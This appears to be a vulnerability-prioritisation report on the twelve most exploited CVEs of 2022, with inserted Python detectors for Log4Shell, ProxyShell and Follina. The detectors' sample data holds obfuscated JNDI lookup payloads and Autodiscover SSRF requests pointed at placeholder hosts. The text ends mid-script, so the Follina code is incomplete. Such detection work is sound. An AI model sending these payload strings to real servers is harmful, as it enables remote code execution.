Report Name: AA23-215A_top12 report
Generated: 2023-08-05 13:55:37
Vulristics Vulnerability Scores
- All vulnerabilities: 12
- Urgent: 11
- Critical: 1
- High: 0
- Medium: 0
- Low: 0
Basic Vulnerability Scores
- All vulnerabilities: 12
- Critical: 9
- High: 2
- Medium: 1
- Low: 0
Products
Product Name | Prevalence | U (Urgent) | C (Critical) | H (High) | M (Medium) | L (Low) | A (All) | Comment |
---|---|---|---|---|---|---|---|---|
Apache Log4j2 | 0.9 | 1 | | | | | 1 | Log4j 2 is the revamped version of the Apache Log4j logging framework |
Microsoft Exchange | 0.8 | 3 | | | | | 3 | Microsoft Exchange Server is a mail server and calendaring server developed by Microsoft |
Microsoft Windows Support Diagnostic Tool (MSDT) | 0.8 | 1 | | | | | 1 | The Microsoft Support Diagnostic Tool is a legacy service in Microsoft Windows that allows Microsoft technical support agents to analyze diagnostic data remotely for troubleshooting purposes |
BIG-IP | 0.7 | 1 | | | | | 1 | BIG-IP is F5's Application Delivery Controller (ADC) platform; products built on it are load balancers and related traffic-management appliances, and its iControl REST management API is the component affected here |
Confluence Server | 0.7 | 2 | | | | | 2 | Confluence is a web-based corporate wiki |
FortiOS | 0.5 | 1 | | | | | 1 | FortiOS is Fortinet's operating system used in their hardware, such as FortiGate firewalls and switches |
VMware Workspace One | 0.5 | 1 | 1 | | | | 2 | VMware Workspace ONE is a management platform that lets IT administrators centrally control end users' mobile devices and cloud-hosted virtual desktops and applications, from the cloud or from an on-premises deployment; the affected component here is Workspace ONE Access (formerly Identity Manager), its identity and single sign-on service |
Zoho ManageEngine ADSelfService Plus | 0.5 | 1 | | | | | 1 | Zoho ManageEngine ADSelfService Plus is an integrated self-service password management and single sign-on solution for Active Directory and cloud apps |
Vulnerability Types
Vulnerability Type | Criticality | U (Urgent) | C (Critical) | H (High) | M (Medium) | L (Low) | A (All) |
---|---|---|---|---|---|---|---|
Remote Code Execution | 1.0 | 7 | | | | | 7 |
Authentication Bypass | 0.95 | 1 | | | | | 1 |
Security Feature Bypass | 0.9 | 1 | | | | | 1 |
Elevation of Privilege | 0.5 | 1 | 1 | | | | 2 |
Path Traversal | 0.4 | 1 | | | | | 1 |
Comments
Source | U (Urgent) | C (Critical) | H (High) | M (Medium) | L (Low) | A (All) |
---|---|---|---|---|---|---|
Comment | 11 | 1 | | | | 12 |
Vulnerabilities
Urgent (11)
1. Remote Code Execution - Apache Log4j2 (CVE-2021-44228) - Urgent [983]
Description: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Component | Value | Weight | Comment |
---|---|---|---|
Exploited in the Wild | 1.0 | 18 | Exploitation in the wild is mentioned on Vulners (CISA object, CISA object, CISA object), AttackerKB, Microsoft websites |
Public Exploit Exists | 1.0 | 17 | The existence of a publicly available exploit is mentioned on Vulners website (Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Expression Language Injection in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Expression Language Injection in Apache Log4J, Exploit for Expression Language Injection in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Deserialization of Untrusted Data in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Deserialization of Untrusted Data in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Expression Language Injection in Apache Log4J, Exploit for Deserialization of Untrusted Data in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Deserialization of Untrusted Data in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper 
Input Validation in Apache Log4J, Exploit for Expression Language Injection in Apache Log4J, Exploit for Expression Language Injection in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Deserialization of Untrusted Data in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Deserialization of Untrusted Data in Apache Log4J, Exploit for Deserialization of Untrusted Data in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Deserialization of Untrusted Data in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Deserialization of Untrusted Data in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Expression Language Injection in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Deserialization of Untrusted Data in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Deserialization of 
Untrusted Data in Apache Log4J, Exploit for Deserialization of Untrusted Data in Apache Log4J, Log4Shell HTTP Header Injection, Intel Data Center Manager 5.1 Local Privilege Escalation, MobileIron Log4Shell Remote Command Execution) |
Criticality of Vulnerability Type | 1.0 | 15 | Remote Code Execution |
Vulnerable Product is Common | 0.9 | 14 | Log4j 2 is the revamped version of the Apache Log4j logging framework |
CVSS Base Score | 1.0 | 10 | CVSS Base Score is 10.0. According to Vulners data source |
EPSS Percentile | 1.0 | 10 | EPSS Probability is 0.97567, EPSS Percentile is 0.99996 |
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2021-44228. This vulnerability, known as Log4Shell, affects Apache’s Log4j library, an open-source logging framework incorporated into thousands of products worldwide. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code. The request allows a cyber actor to take full control of a system. The actor can then steal information, launch ransomware, or conduct other malicious activity.[1] Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest in CVE-2021-44228 through the first half of 2022.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2021-44228 (Log4Shell) Apache Log4j2 RCE CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection') CWE-20 Improper Input Validation CWE-400 Uncontrolled Resource Consumption CWE-502 Deserialization of Untrusted Data
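The description above says the trigger is an attacker-controlled string reaching a logger with message lookup substitution enabled. As an added illustration of the detection side (example code written for this edit, not part of the report or of the Log4j project), the Python below scans access-log lines for JNDI lookups, first undoing URL encoding and collapsing the nested lookup forms that scanners used to evade a naive `${jndi:` string match (`${lower:j}`, `${::-j}`, `${env:NOPE:-j}`). The log lines, hosts and addresses are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the report). The User-Agent
# field carries the injected lookup, which is where mass Log4Shell scanning
# was most often seen; ${date:yyyy} on the last line is a benign lookup.
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.7/x}"',
    '10.0.0.7 - - [10/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7/y}"',
    '10.0.0.8 - - [10/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 "-" "${${env:NOPE:-j}ndi:dns://203.0.113.7/z}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:05 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.7%2Fq%7D HTTP/1.1" 200 "-" "curl/7.79"',
    '10.0.0.10 - - [10/Dec/2021:10:00:06 +0000] "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.11 - - [10/Dec/2021:10:00:07 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 "-" "curl/7.79"',
]

# ${lower:x} / ${upper:x} evaluate to x (the whole string is lower-cased at the end).
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# ${name:-default} evaluates to the default when the lookup is undefined;
# ${::-j} is the degenerate form with an empty lookup name. Innermost first,
# because the character class excludes braces.
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# After normalisation every variant collapses to ${jndi:<scheme>:...}.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:")


def normalize(text: str, max_rounds: int = 20) -> str:
    """Undo URL encoding and collapse nested Log4j lookups until stable."""
    text = unquote(text)
    for _ in range(max_rounds):
        collapsed = CASE_LOOKUP.sub(lambda m: m.group(1), text)
        collapsed = DEFAULT_LOOKUP.sub(lambda m: m.group(1), collapsed)
        if collapsed == text:
            break
        text = collapsed
    return text.lower()


def jndi_scheme(line: str):
    """Return the JNDI scheme (ldap, rmi, dns, ...) if the line carries a lookup, else None."""
    m = JNDI_LOOKUP.search(normalize(line))
    return m.group(1) if m else None


def scan_lines(lines):
    """Return (line_index, scheme) for every line that contains a JNDI lookup."""
    return [(i, s) for i, line in enumerate(lines) if (s := jndi_scheme(line))]


if __name__ == "__main__":
    for idx, scheme in scan_lines(SAMPLE_LINES):
        print(f"line {idx}: JNDI lookup via {scheme}")
```

Run as a script to list the flagged lines with the JNDI scheme each one resolves to. The normalisation covers only the lookup forms shown; a production rule should run over every field the application logs (headers, bodies, usernames), since anything that reaches a logger is a candidate input.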
2. Remote Code Execution - Microsoft Exchange (CVE-2021-34473) - Urgent [954]
Description: Microsoft Exchange Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2021-31196 and CVE-2021-31206. CVE-2021-34473 is the pre-authentication server-side request forgery (CWE-918) in the Exchange Autodiscover front end that serves as the entry point of the ProxyShell chain: on its own it lets an unauthenticated client reach back-end Exchange endpoints through the Client Access Service, and chained with CVE-2021-34523 and CVE-2021-31207 it yields remote code execution.
Component | Value | Weight | Comment |
---|---|---|---|
Exploited in the Wild | 1.0 | 18 | Exploitation in the wild is mentioned on Vulners (AttackerKB object, CISA object), AttackerKB websites |
Public Exploit Exists | 1.0 | 17 | The existence of a publicly available exploit is mentioned on Vulners website (Exploit for Server-Side Request Forgery in Microsoft, Exploit for Server-Side Request Forgery in Microsoft, Exploit for Server-Side Request Forgery in Microsoft, Exploit for Server-Side Request Forgery in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Deserialization of Untrusted Data in Apache Log4J, Exploit for Vulnerability in Microsoft, Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft, Microsoft Exchange ProxyShell Remote Code Execution, Microsoft Exchange ProxyShell RCE, Exchange ProxyOracle information disclosure exploit chain (CVE-2021-31195, CVE-2021-31196)) |
Criticality of Vulnerability Type | 1.0 | 15 | Remote Code Execution |
Vulnerable Product is Common | 0.8 | 14 | Microsoft Exchange Server is a mail server and calendaring server developed by Microsoft |
CVSS Base Score | 0.9 | 10 | CVSS Base Score is 9.1. According to Microsoft data source |
EPSS Percentile | 1.0 | 10 | EPSS Probability is 0.97442, EPSS Percentile is 0.99909 |
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2021-34473, CVE-2021-31207, CVE-2021-34523. These vulnerabilities, known as ProxyShell, affect Microsoft Exchange email servers. In combination, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2021-34473 (Proxy Shell) Microsoft Exchange Server RCE CWE-918 Server-Side Request Forgery (SSRF)
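The comment above points at where ProxyShell activity leaves traces: the IIS W3C logs of the internet-facing Client Access front end. As an added example (written for this edit, not code from the report or from Microsoft), the Python below parses IIS log lines and flags requests to `/autodiscover/autodiscover.json` whose query string uses the `@host/backend` form through which the Autodiscover SSRF reaches the MAPI, PowerShell, EWS, ECP or OWA back ends. Log lines, IP addresses and hostnames are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample IIS W3C log (not from the report). Lines 1-2 show the
# Autodiscover path-confusion pattern: a request to autodiscover.json whose
# query begins "@<anything>/<backend>/". Lines 3-4 are ordinary Autodiscover
# and OWA traffic. IIS writes "+" for spaces inside the User-Agent field.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2021-08-12 10:15:01 10.1.1.10 GET /autodiscover/autodiscover.json @evil.example/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@evil.example 443 - 198.51.100.23 python-requests/2.25.1 - 200 0 0 120
2021-08-12 10:15:02 10.1.1.10 POST /autodiscover/autodiscover.json @evil.example/powershell/ 443 - 198.51.100.23 python-requests/2.25.1 - 200 0 0 300
2021-08-12 10:15:03 10.1.1.10 POST /autodiscover/autodiscover.xml - 443 CORP\\alice 10.1.5.20 Microsoft+Office/16.0 - 200 0 0 30
2021-08-12 10:15:04 10.1.1.10 GET /owa/ - 443 - 10.1.5.21 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 15
"""

# Default IIS field order; overridden by any "#Fields:" header in the log.
IIS_FIELDS = ("date time s-ip cs-method cs-uri-stem cs-uri-query s-port "
              "cs-username c-ip cs(User-Agent) cs(Referer) sc-status "
              "sc-substatus sc-win32-status time-taken").split()

AUTODISCOVER_JSON = "/autodiscover/autodiscover.json"
# "@<host>/<backend>" inside the query string of an autodiscover.json request.
BACKEND = re.compile(r"@[^/\s]+/(mapi|powershell|ews|ecp|owa)\b")


def parse_iis(log_text: str):
    """Yield one dict per data line, keyed by the field names in the #Fields header."""
    fields = IIS_FIELDS
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if raw.startswith("#"):  # other directives (#Software, #Date, ...)
            continue
        parts = raw.split(" ")
        if len(parts) != len(fields):
            continue  # malformed line; a real pipeline would count these
        yield dict(zip(fields, parts))


def find_proxyshell_requests(log_text: str):
    """Return (client_ip, method, backend) for each Autodiscover path-confusion request."""
    hits = []
    for rec in parse_iis(log_text):
        if rec["cs-uri-stem"].lower() != AUTODISCOVER_JSON:
            continue
        query = unquote(rec["cs-uri-query"]).lower()  # catch %40-encoded "@"
        m = BACKEND.search(query)
        if m:
            hits.append((rec["c-ip"], rec["cs-method"], m.group(1)))
    return hits


if __name__ == "__main__":
    for ip, method, backend in find_proxyshell_requests(SAMPLE_LOG):
        print(f"{ip} {method} autodiscover.json -> {backend} back end")
```

The check is deliberately narrow: a legitimate Autodiscover request never carries `@host/mapi` or `@host/powershell` in its query string, so a hit from an external client is worth an immediate look, whereas volume-based rules on Autodiscover alone drown in normal Outlook traffic.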
3. Remote Code Execution - Confluence Server (CVE-2021-26084) - Urgent [950]
Description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
Component | Value | Weight | Comment |
---|---|---|---|
Exploited in the Wild | 1.0 | 18 | Exploitation in the wild is mentioned on Vulners (AttackerKB object), AttackerKB websites |
Public Exploit Exists | 1.0 | 17 | The existence of a publicly available exploit is mentioned on Vulners website (Exploit for Injection in Atlassian Confluence, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence, Exploit for Injection in Atlassian Confluence, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence, Exploit for Injection in Atlassian Confluence, Exploit for Injection in Atlassian Confluence, Exploit for Injection in Atlassian Confluence, Exploit for Injection in Atlassian Confluence, Exploit for OS Command Injection in Zeroshell, Exploit for Deserialization of Untrusted Data in Apache Log4J, Atlassian 
Confluence WebWork OGNL Injection Exploit, Confluence Server 7.12.4 - (OGNL injection) Remote Code Execution Exploit, Atlassian Confluence Namespace OGNL Injection Exploit, Atlassian Confluence WebWork OGNL Injection, Atlassian Confluence WebWork OGNL Injection, Confluence Server 7.12.4 OGNL Injection Remote Code Execution, Atlassian Confluence Namespace OGNL Injection, Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)) |
Criticality of Vulnerability Type | 1.0 | 15 | Remote Code Execution |
Vulnerable Product is Common | 0.7 | 14 | Confluence is a web-based corporate wiki |
CVSS Base Score | 1.0 | 10 | CVSS Base Score is 9.8. According to Vulners data source |
EPSS Percentile | 1.0 | 10 | EPSS Probability is 0.97477, EPSS Percentile is 0.99945 |
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2021-26084. This vulnerability, affecting Atlassian Confluence Server and Data Center (a web-based collaboration tool used by governments and private companies) could enable an unauthenticated cyber actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a PoC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021.
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2022-26134. This critical RCE vulnerability affects Atlassian Confluence and Data Center. The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability (CVE-2021-26084), which cyber actors also exploited in 2022.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2021-26084 Atlassian Confluence Server and Data Center Arbitrary code execution CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
4. Remote Code Execution - Confluence Server (CVE-2022-26134) - Urgent [950]
Description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.
Component | Value | Weight | Comment |
---|---|---|---|
Exploited in the Wild | 1.0 | 18 | Exploitation in the wild is mentioned on Vulners (cisa_kev object), AttackerKB websites |
Public Exploit Exists | 1.0 | 17 | The existence of a publicly available exploit is mentioned on Vulners website (Atlassian Confluence Namespace OGNL Injection, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for CVE-2022-26134, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian 
Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Confluence OGNL Injection Remote Code Execution, Atlassian Confluence Namespace OGNL Injection, Confluence Data Center 7.18.0 - Remote Code Execution Exploit, Confluence OGNL Injection Remote Code Execution Exploit, Atlassian Confluence Namespace OGNL Injection Exploit, Confluence Data Center 7.18.0 - Remote Code Execution (RCE)) |
Criticality of Vulnerability Type | 1.0 | 15 | Remote Code Execution |
Vulnerable Product is Common | 0.7 | 14 | Confluence is a web-based corporate wiki |
CVSS Base Score | 1.0 | 10 | CVSS Base Score is 9.8. According to Vulners data source |
EPSS Percentile | 1.0 | 10 | EPSS Probability is 0.97537, EPSS Percentile is 0.99985 |
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2022-26134. This critical RCE vulnerability affects Atlassian Confluence and Data Center. The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability (CVE-2021-26084), which cyber actors also exploited in 2022.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2022-26134 Atlassian Confluence Server and Data Center RCE CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
5. Remote Code Execution - Microsoft Windows Support Diagnostic Tool (MSDT) (CVE-2022-30190) - Urgent [942]
Description: Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability, publicly known as Follina. Despite the "remote" label, the CVSS 7.8 base score reflects a local attack vector: the code path is reached when a user opens a crafted document (in the wild, Office documents that invoke MSDT through its URL protocol handler), so the practical controls are the Microsoft patch and, until it is applied, Microsoft's workaround of disabling the MSDT URL protocol handler.
Component | Value | Weight | Comment |
---|---|---|---|
Exploited in the Wild | 1.0 | 18 | Exploitation in the wild is mentioned on Vulners (cisa_kev object), AttackerKB, Microsoft websites |
Public Exploit Exists | 1.0 | 17 | The existence of a publicly available exploit is mentioned on Vulners website (Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, 
Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Microsoft Office Word MSDTJS, Microsoft Office Word MSDTJS Code Execution, Microsoft Office MSDT Follina Proof Of Concept, Microsoft Office Word MSDTJS Code Execution Exploit) |
Criticality of Vulnerability Type | 1.0 | 15 | Remote Code Execution |
Vulnerable Product is Common | 0.8 | 14 | The Microsoft Support Diagnostic Tool is a legacy service in Microsoft Windows that allows Microsoft technical support agents to analyze diagnostic data remotely for troubleshooting purposes |
CVSS Base Score | 0.8 | 10 | CVSS Base Score is 7.8. According to Microsoft data source |
EPSS Percentile | 1.0 | 10 | EPSS Probability is 0.97319, EPSS Percentile is 0.99801 |
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2022-30190. This vulnerability impacts the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated cyber actor could exploit this vulnerability to take control of an affected system.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2022-30190 Microsoft Multiple Products RCE CWE: None Listed
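Because CVE-2022-30190 is reached through a crafted document rather than a network listener, the useful detection point is the document itself. As an added example (written for this edit, not code from the report or from Microsoft), the Python below inspects a .docx package for the trait of the Follina samples, an OLE object relationship whose target is an external URL instead of an embedded part, and also flags any `ms-msdt:` URI carried in the package. The two documents it builds are constructed fixtures; the host in the malicious one is made up.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

OLE_OBJECT = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
HYPERLINK = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"


def build_docx(rels_xml: str) -> bytes:
    """Build a minimal docx-shaped zip in memory (constructed test fixture)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Follina-style: an OLE object whose target is an external URL (the trailing
# "!" is how the in-the-wild samples wrote it). The host is constructed.
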